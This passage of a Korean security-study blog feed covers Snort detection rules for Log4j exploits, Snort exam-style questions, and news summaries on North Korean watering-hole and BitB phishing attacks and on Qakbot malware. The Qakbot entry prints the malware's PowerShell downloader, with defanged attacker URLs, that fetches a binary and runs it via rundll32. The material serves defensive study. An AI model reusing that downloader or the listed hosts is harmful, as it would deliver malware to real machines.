justify;&quot;&gt;[\b]&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;back space. \b와 혼동하면 안됨&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr style=&quot;height: 20px;&quot;&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;\B&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;단어 경계가 아님&lt;/td&gt;&lt;td style=&quot;width: 33.3333%; height: 20px; text-align: justify;&quot;&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot;&gt;&lt;h3 style=&quot;text-align: left;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;Snort 탐지룰 예시 &lt;/b&gt;&lt;/h3&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;1) log4j 관련 snort 탐지룰&lt;/p&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;(출처 : PIOLINK, &lt;a href=&quot;https://www.piolink.com/kr/service/Security-Analysis.php?bbsCode=security&amp;amp;vType=view&amp;amp;idx=95)&quot; target=&quot;_self&quot;&gt;&lt;span&gt;https://www.piolink.com/kr/service/Security-Analysis.php?bbsCode=security&amp;amp;vType=view&amp;amp;idx=95)&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;b&gt;#CVE-2021-44228&amp;nbsp;&lt;/b&gt;&lt;br&gt;alert tcp any any -&amp;gt; any any (msg:&quot;Apache_Log4j_RCE&quot;; pcre:”/\x24(\x7b|%7B)(jndi:|rmi:|ldap:|dns:) /i&quot;)&lt;br&gt;alert tcp any any -&amp;gt; any any (msg:&quot;Apache_Log4j_RCE&quot;; pcre:&quot;/\x24(\x7b|%7B)(lower:|upper:)?[jndilapsrmev]{1,4}/i&quot;)&lt;br&gt;alert tcp any any -&amp;gt; any any (msg:&quot;Apache_Log4j_RCE&quot;; pcre:&quot;/\x24(\x7b|%7B)(\x3a\x3a\x2d(j|n|d|i)\x7d)/i&quot;)&lt;br&gt;&amp;nbsp;&lt;br&gt;&lt;b&gt;#CVE-2021-45046&lt;/b&gt;&lt;br&gt;alert tcp any any -&amp;gt; any any (msg:&quot;Apache_Log4j_DOS&quot;; contents:&quot;|0d 0a|X-Api-Version|3a 20|&quot;; pcre:&quot;/\x24\7bctx\x3a/i&quot;)&lt;br&gt;&lt;br&gt;&lt;b&gt;#CVE-2021-45105&lt;/b&gt;&lt;br&gt;alert tcp any any -&amp;gt; any any (msg:&quot;Apache_Log4j_DOS&quot;; contents:&quot;|0d 0a|X-Api-Version|3a 20|&quot;; pcre:&quot;/(\x24\x7b){1,}[\x3a,\x2d,\x7b\,\x24]+\x7d/i&quot;)&lt;/blockquote&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;x24 : $&lt;br&gt;x7b : {&lt;br&gt;x3a : :&lt;br&gt;x2d : -&lt;br&gt;x7d : }&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot;&gt;&lt;h4 style=&quot;text-align: left;&quot; data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;SNORT RULE 관련 문제&amp;nbsp;&lt;/b&gt;&lt;/h4&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;blockquote data-ke-style=&quot;style3&quot;&gt;Q1 : 모든 네트워크 대역에서 Telnet으로 접속하는 패킷 중 14번째 자리까지 'anonymous'가 포함된 트래픽에 대해서 'Dangerous' 메시지로 경고하는 rule을 만드시오. &lt;br&gt;(단, 기본적으로 TCP 프로토콜 경유를 탐지함.)&lt;/blockquote&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;br&gt;&lt;b&gt;[필요한 룰 헤더]&lt;/b&gt;&lt;br&gt;1. action : alert&lt;br&gt;2. protocol : tcp&lt;br&gt;3. 출발지 IP : any&lt;br&gt;4. 출발지 Port : any&lt;br&gt;5. 방향 : -&amp;gt;&lt;br&gt;6. 도착지 IP : any&lt;br&gt;7. 도착지 Port : 23 (telnet 서비스)&lt;br&gt;&amp;nbsp;&lt;br&gt;&lt;b&gt;[룰 옵션]&lt;/b&gt;&lt;br&gt;1. 경고 메시지 : msg:&quot;Dangerous&quot;&lt;br&gt;2. 문자열 탐지 : content:&quot;anonymous&quot;&lt;br&gt;3. 14번째 자리까지 탐지 : depth:14&lt;br&gt;4. sid:1000001 (사용자가 설정한 경우 100만 이상지정. 문제에 따로 언급이 없어 생략가능)&lt;br&gt;&amp;nbsp;&lt;br&gt;주의사항 : ';' 마지막까지 넣기&lt;br&gt;&amp;nbsp;&lt;br&gt;[결과]&lt;br&gt;&lt;b&gt;alert tcp any any -&amp;gt; any 23 (msg:&quot;Dangerous&quot;; content:&quot;anonymous&quot;; depth:14; sid:1000001;) 또는&lt;/b&gt;&lt;br&gt;&lt;b&gt;alert tcp any any -&amp;gt; any 23 (msg:&quot;Dangerous&quot;; content:&quot;anonymous&quot;; depth:14;)&lt;/b&gt;&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;blockquote data-ke-style=&quot;style3&quot;&gt;Q2 : Snort 정책에서 10바이트에서 12바이트 중 00FF 바이트에 해당하는 내용을 찾으려고 한다. &lt;br&gt;보기의 rule에 빈칸을 채워 rule을 완성하시오.&lt;br&gt;&lt;b&gt;alert tcp $EXTERNAL_NET any -&amp;gt; $INTERNAL_NET any (msg:&quot;TEST&quot;; ( A ):&quot;|00FF|&quot;; ( B ):9; ( C ):2; sid:10000001;)&lt;/b&gt;&lt;/blockquote&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;br&gt;(A) : content&lt;br&gt;(B) : offset&lt;br&gt;(C) : depth&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;blockquote data-ke-style=&quot;style3&quot;&gt;Q3. Snot Rule을 보고 다음을 답하시오.&lt;br&gt;&lt;b&gt;alert any any -&amp;gt; any 80 (msg : &quot;XSS&quot;; content : &quot;GET&quot;; offset:1; depth:3; content:&quot;/login.php?p=&amp;lt;script&amp;gt;&quot;; distance:1;)&amp;nbsp;&lt;/b&gt;&lt;/blockquote&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;br&gt;1)&lt;b&gt; content : &quot;GET&quot;; offset:1; depth:3;&lt;/b&gt; 구문의 의미 ?&amp;nbsp;&lt;br&gt;페이로드에서 1바이트 띄고 3바이트 내에서 &quot;GET&quot; 문자열을 검사&lt;br&gt;&amp;nbsp;&lt;br&gt;2) &lt;b&gt;content : &quot;./login.php?p=&amp;lt;script&amp;gt;&quot;; distance:1;&lt;/b&gt; 구문의 의미&lt;br&gt;앞의 매칭된 문자열에서 1byte 떨어진 지점에서 &quot;./login.php?p=&amp;lt;script&amp;gt;&quot; 문자열을 검사&lt;br&gt;&amp;nbsp;&lt;br&gt;3) &lt;b&gt;&quot;/Login.php?p=&amp;lt;script&amp;gt;&quot;&lt;/b&gt; 이 탐지되지 않았다. 위의 룰을 어떻게 변경해야 하는 가?&lt;br&gt;&amp;nbsp;&amp;gt; 대소문자 구별을 하지않도록 설정하는 nocase 구문을 추가해준다.&lt;br&gt;alert any any - &amp;gt; any 80 ( msg : &quot;XSS&quot;; content :&quot;GET&quot;; offset:1; depth:3; content:&quot;/login.php?p=&amp;lt;script&amp;gt;&quot;; distance:1; &lt;b&gt;&lt;span style=&quot;color: #EE2323;&quot;&gt;nocase;&lt;/span&gt;&lt;/b&gt;)&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;div&gt; 
 &lt;div&gt; 
  &lt;div&gt; 
   &lt;div&gt; 
    &lt;div&gt; 
     &lt;blockquote data-ke-style=&quot;style3&quot;&gt;
      Q4. ①~⑤가 뜻하는 것은?
      &lt;br&gt;&lt;b&gt;alert tcp any any -&amp;gt; any ① [443,465,523] ( ② content:&quot;|18 03 00|&quot;; depth: 3; ③ content:&quot;|01|&quot;; distance: 2; within: 1; ④ content:!&quot;|00|&quot;; within: 1; ⑤ msg: &quot;SSLv3 Malicious Heartbleed Request V2&quot;; sid: 1; )&amp;nbsp;&lt;/b&gt;
     &lt;/blockquote&gt; 
    &lt;/div&gt; 
   &lt;/div&gt; 
  &lt;/div&gt; 
 &lt;/div&gt; 
&lt;/div&gt;&lt;div&gt; 
 &lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000;&quot;&gt;​&lt;/span&gt;&lt;/p&gt; 
 &lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000;&quot;&gt;① 목적지 포트가 443, 465, 523&lt;/span&gt;&lt;/p&gt; 
 &lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000;&quot;&gt;② content에서 첫번째 3바이트를 바이너리 값으로 |18 03 00| 검사&lt;/span&gt;&lt;/p&gt; 
 &lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000;&quot;&gt;③ &lt;span style=&quot;background-color: #ffffff; color: #000000;&quot;&gt;②&lt;/span&gt;번이 끝난 위치에서 2바이트 띄고 1바이트 값이 바이너리 값으로 |01| 검사&lt;/span&gt;&lt;/p&gt; 
 &lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000;&quot;&gt;④ &lt;span style=&quot;background-color: #ffffff; color: #000000;&quot;&gt;③&lt;/span&gt;번이 끝난 위치에서 바로 1바이트 값이 바이너리 값 |00|이 아닌지(!) 검사&lt;/span&gt;&lt;/p&gt; 
 &lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000;&quot;&gt;⑤ 위의 모든 조건 만족시 msg : &quot;SSLv3 Malicious Heartbleed Request V2&quot; 를 기록하고 해당 룰의 식별자를 1로 지정&lt;/span&gt;&lt;/p&gt; 
&lt;/div&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>네트워크  /네트워크 보안 방법</category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/621</guid>
      <comments>https://jennana.tistory.com/621#entry621comment</comments>
      <pubDate>Fri, 21 Apr 2023 11:54:42 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 금융보안인증 SW 취약점 공격&amp;middot;&amp;middot;&amp;middot;北 해커그룹 소행이었다</title>
      <link>https://jennana.tistory.com/620</link>
      <description>&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1080&quot; data-origin-height=&quot;1165&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/IRi20/btsbk7BKUNU/dHl1VlakswsK5yFzAK8If0/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/IRi20/btsbk7BKUNU/dHl1VlakswsK5yFzAK8If0/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/IRi20/btsbk7BKUNU/dHl1VlakswsK5yFzAK8If0/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FIRi20%2Fbtsbk7BKUNU%2FdHl1VlakswsK5yFzAK8If0%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1080&quot; height=&quot;1165&quot; data-origin-width=&quot;1080&quot; data-origin-height=&quot;1165&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약 :&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;금융보안인증 소프트웨어 취약점으로 국내 PC를 해킹한 사건의 배후가 북한의 해킹그룹인 라자루스라고 한다. 해당 해킹 방식은 2021년 4월 금융보안인증 업체를 해킹해 취약점을 발견하고 장기간 공격에 이용할 웹 서버, 경유지를 찾은 다음 대다수가 이용하는 언론사 사이트를 악성코드 유포 사이트로 이용이 하였다고 한다. 해킹된 기관은 61개가 된다고 한다.&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;- 해킹 공격 : 워터링홀 수법&lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;gt;&amp;gt; 특정 언론사 사이트 접속 시 자동으로 악성코드가 설치&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;조재학 기자, 금융보안인증 SW 취약점 공격···北 해커그룹 소행이었다, 전자신문, &lt;a href=&quot;https://m.etnews.com/20230418000138&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://m.etnews.com/20230418000138&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;금융보안인증 SW 취약점 공격···北 해커그룹 소행이었다&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;금융보안인증 소프트웨어(SW) 취약점을 악용해 국내 주요 기관 개인용 컴퓨터(PC)를 해킹한 사건이 북한 해커조직 라자루스 소행인 것으로 확인됐다. 경찰청 국가수사본부(안보수사국)는 국가정&quot; data-og-host=&quot;www.etnews.com&quot; data-og-source-url=&quot;https://m.etnews.com/20230418000138&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/d3ehzM/hySlMf00sj/OgOpBiVUObwJOkOPmm7Hq1/img.jpg?width=1000&amp;amp;height=667&amp;amp;face=0_0_1000_667&quot; data-og-url=&quot;https://www.etnews.com/20230418000138?SNS=00002&quot;&gt;&lt;a href=&quot;https://www.etnews.com/20230418000138?SNS=00002&quot; target=&quot;_blank&quot; data-source-url=&quot;https://m.etnews.com/20230418000138&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/d3ehzM/hySlMf00sj/OgOpBiVUObwJOkOPmm7Hq1/img.jpg?width=1000&amp;amp;height=667&amp;amp;face=0_0_1000_667')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;금융보안인증 SW 취약점 공격···北 해커그룹 소행이었다&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;금융보안인증 소프트웨어(SW) 취약점을 악용해 국내 주요 기관 개인용 컴퓨터(PC)를 해킹한 사건이 북한 해커조직 라자루스 소행인 것으로 확인됐다. 경찰청 국가수사본부(안보수사국)는 국가정&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;www.etnews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/620</guid>
      <comments>https://jennana.tistory.com/620#entry620comment</comments>
      <pubDate>Thu, 20 Apr 2023 19:42:25 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 북한 해커조직, 실제 주소와 똑같은 피싱 사이트 사용한다? BitB 기술 악용</title>
      <link>https://jennana.tistory.com/619</link>
      <description>&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1080&quot; data-origin-height=&quot;666&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/uQlPZ/btsbmP75j2M/QLkayZWZLcp0LWkFLTVWC0/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/uQlPZ/btsbmP75j2M/QLkayZWZLcp0LWkFLTVWC0/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/uQlPZ/btsbmP75j2M/QLkayZWZLcp0LWkFLTVWC0/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FuQlPZ%2FbtsbmP75j2M%2FQLkayZWZLcp0LWkFLTVWC0%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1080&quot; height=&quot;666&quot; data-origin-width=&quot;1080&quot; data-origin-height=&quot;666&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #0DB4A0;&quot;&gt;기사 요약 : &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;과거의 피싱 공격의 경우 사이트 주소를 유사하게 바꾸는 눈속임 공격이었다면 최신 공격은 BitB(Browser in the Browser) 기술을 이용하여 실제 사이트 주소가 표시되기 때문에 화면만으로 피싱 페이지를 알 수 없도록 고도화되었다고 한다.&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;br&gt;- 과거 : (실제) google.com → (피싱) g00gle.com&lt;br&gt;- 피싱 사이트 :&lt;br&gt;1) 정교하게 제작된 CSS 코드&lt;br&gt;2) 요즘 접속할 때 주소를 확인하는 교육&lt;br&gt;→ 공격자가 주소 표시줄을 조작하는 기법 개발&lt;br&gt;3) 가짜 팝업창을 만들기 때문에 정상 팝업창과 달리 브라우저 밖으로 이동되지 않음.&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;김경애 기자, 북한 해커조직, 실제 주소와 똑같은 피싱 사이트 사용한다? BitB 기술 악용, 보안뉴스, &lt;a href=&quot;https://m.boannews.com/html/detail.html?idx=117162&quot; target=&quot;_blank&quot;&gt;&lt;span&gt;https://m.boannews.com/html/detail.html?idx=117162&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;북한 해커조직, 실제 주소와 똑같은 피싱 사이트 사용한다? BitB 기술 악용&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;최근 북한 해커조직이 피싱 공격에 BitB(Browser in the Browser) 기술을 사용하는 등 피싱 관련 기술이 고도화되고 있어 주의가 요구된다. 과거의 피싱 공격은 피싱 사이트의 주소가 실제 사이트와 달&quot; data-og-host=&quot;m.boannews.com&quot; data-og-source-url=&quot;https://m.boannews.com/html/detail.html?idx=117162&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/ckxvlj/hySlIdBHQl/qgAcziAa8s5ho6vkvbsS3K/img.jpg?width=1000&amp;amp;height=738&amp;amp;face=0_0_1000_738&quot; data-og-url=&quot;http://m.boannews.com/html/detail.html?idx=117162&quot;&gt;&lt;a href=&quot;http://m.boannews.com/html/detail.html?idx=117162&quot; target=&quot;_blank&quot; data-source-url=&quot;https://m.boannews.com/html/detail.html?idx=117162&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/ckxvlj/hySlIdBHQl/qgAcziAa8s5ho6vkvbsS3K/img.jpg?width=1000&amp;amp;height=738&amp;amp;face=0_0_1000_738')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;북한 해커조직, 실제 주소와 똑같은 피싱 사이트 사용한다? BitB 기술 악용&lt;/p&gt;&lt;p class=&quot;og-desc&quot;&gt;최근 북한 해커조직이 피싱 공격에 BitB(Browser in the Browser) 기술을 사용하는 등 피싱 관련 기술이 고도화되고 있어 주의가 요구된다. 과거의 피싱 공격은 피싱 사이트의 주소가 실제 사이트와 달&lt;/p&gt;&lt;p class=&quot;og-host&quot;&gt;m.boannews.com&lt;/p&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/619</guid>
      <comments>https://jennana.tistory.com/619#entry619comment</comments>
      <pubDate>Wed, 19 Apr 2023 21:35:29 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 뱅킹 악성코드 칵봇, 이메일 하이재킹 통해 국내 유포중</title>
      <link>https://jennana.tistory.com/618</link>
      <description>&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;619&quot; data-origin-height=&quot;843&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dMTn6k/btr9A0DId8y/LkZjIs6pq2iqEAqprZKaaK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dMTn6k/btr9A0DId8y/LkZjIs6pq2iqEAqprZKaaK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dMTn6k/btr9A0DId8y/LkZjIs6pq2iqEAqprZKaaK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdMTn6k%2Fbtr9A0DId8y%2FLkZjIs6pq2iqEAqprZKaaK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;619&quot; height=&quot;843&quot; data-origin-width=&quot;619&quot; data-origin-height=&quot;843&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #009A87;&quot;&gt;기사 요약 :&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size18&quot; style=&quot;text-align: left;&quot;&gt;&lt;b&gt;뱅킹형 악성코드인 칵봇(Qakbot)이 정상 메일을 가로챈 후에 기존 이메일을 회신 및 전달하는 방식으로 악성 PDF 파일을 첨부해서 유포가 진행되고 있다.&lt;/b&gt;&lt;/p&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;br&gt;[ 악성코드 정보 ]&lt;br&gt;악성코드 정보 : 원문에 대해 점부파일과 함께 전달되어 첨부파일 열람을 유도.&lt;br&gt;- &lt;b&gt;원본 이메일 오간 시점&lt;/b&gt; : 2018년~2022년. 최근 시점은 아님.&lt;br&gt;- 첨부파일 명 : UT.PDF, RA.PDF, NM.PDF 등과 같은 랜덤문자 형태&lt;br&gt;- 동작 방식 :&amp;nbsp;&lt;br&gt;1) 해당 PDF 파일을 실행하면 Microsoft Azure 로고와 함께 OPEN 버튼을 클릭 유도&lt;br&gt;2) Open 버튼 클릭하면 악성 URL 연결, 암호화된 압축 ZIP 파일 다운&lt;br&gt;3) 파일 비밀번호 : 본문에 기재된 Password : 755&lt;br&gt;4) 압축을 해제하면 WSF 파일이 있음&lt;br&gt;&amp;nbsp;   해당 파일 확인하면 안티바이러스 제품 우회를 위해 더미 텍스트와 함께 난독화된 스크립트 코드 확인 가능.&lt;br&gt;5) WSF 파일을 실행함녀 파워쉘 프로세스를 통해 암호화된 데이터 커맨드를 실행.&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp;  해당 파일 복호화하면 URL에서 Qakbot 바이너리를 TMP 경로에 undersluice.Calctuffs 파일명으로 다운로드 후 rundll32.exe 프로세스를 통해 실행.&lt;br&gt;- 파워쉘 코드 :&amp;nbsp;&lt;/p&gt;&lt;pre data-ke-type=&quot;codeblock&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot;&gt;&lt;code&gt;powershell.exe” -ENC “Start-Sleep -Seconds 2; 
$Girnie = (“hxxp://milleniuninformatica.com[.]br/Le9/jGjSkvEqmXp,hxxps://qassimnews[.]com/yweNej/kQBDu,hxxps://stealingexcellence[.]com/rVR9r/yahxNk,hxxps://medano355condominio[.]com/Tt7l/OwZd8xdlWjil,hxxps://choicefaz.com[.]br/w1W2/4gPNeUm0J,hxxps://t-lows[.]com/ggAJ2m/kXpW59tm,hxxps://seicas[.]com/KvtM0/Uj3atvfT4E,hxxps://farmfutures[.]in/tlUtBc/IYj0K1,hxxps://alzheimersdigest[.]net/ZKpva/55C63K,hxxps://antoinettegabriel[.]com/YuUE/RQwyJWR2jjc”).split(“,”); 
foreach ($reflexional in $Girnie) {
&amp;nbsp;&amp;nbsp;try {wget $reflexional -TimeoutSec 17 -O $env:TEMP\undersluice.Calctuffs;
&amp;nbsp;&amp;nbsp;if ((Get-Item $env:TEMP\undersluice.Calctuffs).length -ge 100000) {
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;start rundll32 $env:TEMP\\undersluice.Calctuffs,X555;break;}
&amp;nbsp;&amp;nbsp;} catch {Start-Sleep -Seconds 2;}
 }&lt;/code&gt;&lt;/pre&gt;&lt;p data-ke-size=&quot;size16&quot; style=&quot;text-align: left;&quot;&gt;6) 해당 커맨드가 실행되면 악성 URL에서 Qakbot 바이너리 유포&lt;/p&gt;&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot;&gt;&lt;p data-ke-size=&quot;size14&quot; style=&quot;text-align: left;&quot;&gt;김영명 기자, &lt;span style=&quot;color: #282828;&quot;&gt;뱅킹 악성코드 칵봇, 이메일 하이재킹 통해 국내 유포중, 보안뉴스, &lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=116995&amp;amp;page=2&amp;amp;kind=1&quot; target=&quot;_self&quot;&gt;&lt;span&gt;https://www.boannews.com/media/view.asp?idx=116995&amp;amp;page=2&amp;amp;kind=1&lt;/span&gt;&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;&lt;figure data-ke-type=&quot;opengraph&quot; data-og-title=&quot;뱅킹 악성코드 칵봇, 이메일 하이재킹 통해 국내 유포중&quot; data-ke-align=&quot;alignCenter&quot; data-og-description=&quot;칵봇(Qakbot) 악성코드가 기존의 이메일을 회신 및 전달하는 형태로 악성 PDF 파일을 첨부해 유포되는 정황이 확인됐다. 뱅킹형 악성코드로 알려진 칵봇은 다양한 매개체를 통해 지속해서 유포되&quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;https://www.boannews.com/media/view.asp?idx=116995&amp;amp;page=2&amp;amp;kind=1&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/dbw6LS/hySe2xO39I/aIvg11MMk8KwKe0kom72n0/img.jpg?width=750&amp;amp;height=569&amp;amp;face=0_0_750_569&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=116995&quot;&gt;&lt;a href=&quot;http://www.boannews.com/media/view.asp?idx=116995&quot; target=&quot;_blank&quot; data-source-url=&quot;https://www.boannews.com/media/view.asp?idx=116995&amp;amp;page=2&amp;amp;kind=1&quot;&gt;&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/dbw6LS/hySe2xO39I/aIvg11MMk8KwKe0kom72n0/img.jpg?width=750&amp;amp;height=569&amp;amp;face=0_0_750_569')&quot;&gt; &lt;/div&gt;&lt;div class=&quot;og-text&quot;&gt;&lt;p class=&quot;og-title&quot;&gt;뱅킹 악성코드 칵봇, 이메일 하이재킹 통해 국내 